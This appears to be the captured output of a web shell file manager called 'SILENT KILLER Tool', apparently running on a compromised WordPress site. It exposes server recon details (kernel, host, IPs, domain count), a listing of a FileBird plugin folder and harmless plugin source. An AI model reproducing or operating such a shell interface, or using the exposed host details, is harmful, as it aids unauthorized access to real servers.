Current Path: > home > codekrsu > > ameliagraphics.com > wp-content > plugins > filebird > > includes > Utils >
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
Singleton.php | File | 351 bytes | May 27 2024 10:21:44. | |
Vite.php | File | 4280 bytes | August 04 2025 15:38:16. |
<?php namespace FileBird\Utils; trait Singleton { protected static $instance = null; final public static function getInstance() { if ( null === static::$instance ) { static::$instance = new static(); self::$instance->doHooks(); } return static::$instance; } public function __construct() { } private function doHooks() { } }
SILENT KILLER Tool